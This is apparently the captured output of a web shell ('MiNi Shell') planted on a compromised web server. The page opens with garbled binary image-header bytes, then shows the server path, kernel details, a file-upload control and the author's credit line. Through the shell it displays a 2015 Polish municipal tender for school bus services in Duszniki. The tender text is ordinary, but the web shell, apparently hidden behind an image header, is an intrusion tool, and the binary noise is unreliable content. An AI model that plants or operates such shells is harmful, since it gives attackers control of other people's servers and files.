JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150709/171948-N-2015.html

<p class="kh_header"><b>Duszniki: Świadczenie usług transportowych w zakresie dowozu  dzieci i młodzieży oraz odwozu  po zakończonych zajęciach z Zespołu Szkół w Grzebienisku
 w latach szkolnych 2015-2016  i 2016-2017</b><br>
<b>Numer ogłoszenia: 171948 - 2015; data zamieszczenia: 09.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Duszniki , ul. Sportowa 1, 64-550 Duszniki, woj. wielkopolskie, tel. 61 2919075, 2919400, faks 61 2919131.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.duszniki.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług transportowych w zakresie dowozu  dzieci i młodzieży oraz odwozu  po zakończonych zajęciach z Zespołu Szkół w Grzebienisku
 w latach szkolnych 2015-2016  i 2016-2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Świadczenie usług transportowych w zakresie dowozu  dzieci  i młodzieży oraz odwozu  po zakończonych zajęciach z Zespołu Szkół w Grzebienisku  w latach szkolnych 2015 - 2016  i 2016 - 2017  na podstawie zorganizowanego przetargu nieograniczonego o numerze BZP.271.1.14.2015.
1) Uczniowie będą dowożeni do Zespołu Szkół w Grzebienisku  z przystanków autobusowych  w następujących miejscowościach: Kunowo (trzy przystanki), Mieściska (dwa przystanki), Sarbia (dwa przystanki), Wilkowo (dwa przystanki),  Huby Grzebienisko, Wierzeja, Grodziszczko, Brzoza, Ceradz Dolny (po jednym przystanku). Szacunkową liczbę dzieci określa załącznik nr 1a SIWZ.  Dzieci dowożone są do oddziału przedszkolnego, Szkoły Podstawowej i Gimnazjum w Grzebienisku
 o określonych godzinach, trasami według załącznika nr 1b SIWZ. Realizacja dowozów w roku szkolnym wynosi średnio 38 tygodni, a dzienna długość tras z kilometrami technicznymi  110 km. 
Dojazdy z bazy Wykonawcy na trasy i zjazdy z trasy do bazy oraz dojazd i zjazd autobusu zamiennego nie będą wliczane w koszt usługi .	
2) Do obowiązków Wykonawcy zamówienia należy:
a)  przewóz uczniów z i do miejscowości wskazanych w załącznikach nr 1a i 1b SIWZ, które stanowią integralną część umowy,  w dni nauki szkolnej, 
b) zapewnienie bezpieczeństwa i opieki uczniom podczas przewozu z miejsca zamieszkania do placówki oświatowej oraz w drodze powrotnej, a także w trakcie wsiadania i wysiadania z pojazdu zgodnie z  przepisami prawa, 
c)  odpowiednie do panujących warunków atmosferycznych ogrzewanie pojazdów, 
d)  podstawienia na własny koszt autobusu zastępczego w przypadku awarii autobusu, który dowozi dzieci do placówek oświatowych,
e) posiadania podczas wykonywania usługi wszystkich wymaganych zgodnie z przepisami prawa dokumentów i zezwoleń, 
f)  nie zabierania osób trzecich na trasach na których realizowane są dowozy szkolne. 
g) posiadanie wymaganego prawem  ubezpieczenia działalności przewozowej
3) wykonywanie przewozów wyłącznie środkami transportu, które spełniają wymagania określone  w przepisach ustawy prawo o ruchu drogowym, ustawy o transporcie drogowym i innymi przepisami. Przewozy powinny być realizowane środkami transportu w ilości odpowiedniej do liczby dzieci, miejsc wsiadania i wysiadania oraz godzin rozpoczęcia i zakończenia zajęć. Godziny przywozów  i odwozów mogą ulec zmianie w zależności od organizacji roku szkolnego, np. rozpoczęcie  i zakończenie roku szkolnego, rekolekcje, święto szkoły itp. Autobus powinien posiadać tyle miejsc (zgodnie z dowodem rejestracyjnym), aby zabrać jednym kursem wszystkie dzieci na danej trasie.  Liczba dzieci  może ulec zmianie w trakcie wykonywania Umowy. 
4) zapewnienie i  pokrycie kosztów  opiekuna na każdym kursie wykonywanym dla Zamawiającego. 
 Wykonawca jest zobowiązany do przedstawienia opiekuna na 7 dni przed rozpoczęciem realizacji zamówienia. Opiekunem powinna być osoba o wysokiej kulturze osobistej, opanowana, spokojna, stanowcza i mająca doświadczenia w pracy z dziećmi. 
5) zapewnienie realizacji  dodatkowego kursu odwozów w obu kierunkach dla ok. 40 uczniów we wszystkie czwartki roku szkolnego około godz. 16.30. Ostateczne godziny przywozów i odwozów na dany rok szkolny należy ustalić z dyrektorem Zespołu Szkół w Grzebienisku. Liczba dzieci dowożonych podczas wykonywaniu usługi może ulec niewielkiej zmianie. 
6)  posiadania polisy ubezpieczeniowej - Wykonawca  na własny koszt ubezpieczy działalność objętą zamówieniem oraz poniesie   wyłączną  odpowiedzialność wobec osób trzecich za szkody, które mogą wyniknąć z prowadzonej działalności przewozowej, w tym  na wypadek śmierci lub powstania  uszczerbku na zdrowiu. Polisę ubezpieczeniową  na kwotę nie mniejszą jak 100.000,00 zł Wykonawca przedstawi Zamawiającemu przed zawarciem umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony jeżeli Wykonawca posiada
     uprawnienia i licencje wynikające z ustawy  z dnia 06.09.2001 r. o transporcie drogowym ( Dz. U. z 2013.1414  ze  zm.) na  wykonywanie krajowego transportu drogowego osób - Wykonawca składa 
      oświadczenie wg wzoru zał.nr 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony,  jeżeli Wykonawca  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał przewozy osób (przynajmniej 20 osobowych grup) w ilości co najmniej  40.000 km  z potwierdzeniem , że usługi zostały  wykonane należycie   -   wykaz wg wzoru zał. nr 6  SIWZ
                                 W celu oceny spełniania przez Wykonawcę warunków w zakresie posiadania wiedzy i doświadczenia Wykonawca przedstawi dokumenty:  wykaz najważniejszych usług przewozowych osób wykonanych lub wykonywanych  w okresie ostatnich trzech  lat przed upływem terminu 
        składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania usług  wraz z załączeniem dowodów dotyczących tych usług określających, czy usługi  zostały wykonane lub są wykonywane należycie. 

       Dowodami dotyczącymi najważniejszych usług przewozowych  określającymi, czy usługi  te zostały zostały wykonane w sposób należyty  jest poświadczenie   zamawiającego  te usługi.
        W przypadku,  gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa wyżej. 
       Wykonawca może zamiast poświadczenia przedłożyć oświadczenie, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia,  o którym mowa wyżej.
        Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje. 
         Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty potwierdzające, że łącznie spełniają warunki udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca przedkłada oświadczenie  wg wzoru zał. Nr 4 w SIWZ oraz  sporządza  wykaz  autobusów, którymi  będzie dokonywać przewozu  dzieci z podaniem parametrów wg wzoru  zał. Nr 7 w SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca oraz składa oświadczenie wg wzoru zał.nr 5 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie  spełniania tego warunku - Wykonawca składa oświadczenie wg wzoru  zał.nr 3 w SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy
 w sprawie niniejszego zamówienia, a do wniosku należy dołączyć pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy ; pełnomocnictwo w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza załączyć do oferty.

2. Oferta winna zawierać oświadczenia i dokumenty opisane w pkt.XI.  B.1-2 SIWZ dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.
W przypadku składania oferty przez spółkę cywilną Wykonawca musi złożyć oddzielne dokumenty
 i oświadczenia wynikające z pkt.XI.B. 1-2 SIWZ dla każdego ze wspólników .
3. Oferta winna być podpisana przez każdego partnera lub upoważnionego przedstawiciela / partnera wiodącego.  Kopie dokumentów dotyczących każdego z wykonawców składających ofertę wspólną muszą być poświadczone za zgodność z oryginałem przez osobę lub osoby upoważnione do reprezentowania tych wykonawców.
4.Upoważnienie  do pełnienia funkcji przedstawiciela / partnera wiodącego wymaga podpisu prawnie upoważnionych przedstawicieli każdego z partnerów - należy załączyć do oferty.
Ponadto Wykonawca składa  ofertę :
1.	 na formularzu wg wzoru podanego w SIWZ - zał. nr 2  
2.	dokumenty  potwierdzające posiadanie pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych,
3.	w przypadku, gdy Wykonawca będzie dysponował zasobami innych podmiotów przedstawia Zamawiającemu  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia., zgodnie z zapisami podanymi w SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia  co najmniej jednej z okoliczności wymienionych  niżej , tj.
1) zmiany terminu realizacji przedmiotu umowy będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymanie realizacji przez Zamawiającego.
2) inne przyczyny zewnętrzne mające wpływ na realizację przedmiotu umowy niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością realizacji usługi
3) zmiany wynagrodzenia na podstawie zmiany ceny  oleju napędowego EKODIESEL , tj.
     a)  Zamawiający dopuszcza zmianę stawki za wozokilometr w okresie obowiązywania umowy, jeżeli  średnia hurtowa cena oleju napędowego  ogłaszana przez PKN ORLEN (EKODIESEL) w danym miesiącu  wzrośnie lub zmaleje więcej niż  7 % w stosunku do ceny  obowiązującej w dniu złożenia oferty lub przyjętej później przez strony, zgodnie z postanowieniami umowy jako podstawa do obliczenia nowej stawki wozokilometra. 
      b)  Zamawiający ustala, iż w stawce za wozokilometr udział ceny hurtowej oleju napędowego jest stały  i wynosi 25 % jej wartości. W konsekwencji wystąpienie zmiany średniej hurtowej ceny oleju uzasadniającej zmianę stawki za wozokilometr uzasadnia zmianę tejże stawki wyłącznie w zakresie    elementu kalkulacyjnego , jakim jest zawarta w nim cena hurtowa oleju napędowego.
     
4) zmiany wynagrodzenia  w przypadku :
        a) zmiany stawki podatku od towarów i usług
        b)  zmiany minimalnego wynagrodzenia za pracę ustalonego na podstawie art.2 ust.3-5 ustawy 
        z dnia 10 października 2002 o minimalnym wynagrodzeniu za pracę,
        c)  zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu  
         wysokości   stawki składki na ubezpieczenie społeczne lub zdrowotne
          - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę
Szczegóły postanowień określa par. 10 projektu umowy , który jest  częścią składową SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.duszniki.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Duszniki, ul.Sportowa1, 64-550 Duszniki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2015 godzina 10:00, miejsce: Urząd Gminy Duszniki, ul.Sportowa1, 64-550 Duszniki, Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca zobowiązany jest wskazać w ofercie, które zamówienie powierzy   podwykonawcy.
 W takim przypadku zobowiązany jest do wykazania w formularzu  ofertowym  części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. Brak informacji będzie uznany za stwierdzenie samodzielnego wykonania zamówienia przez   Wykonawcę..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com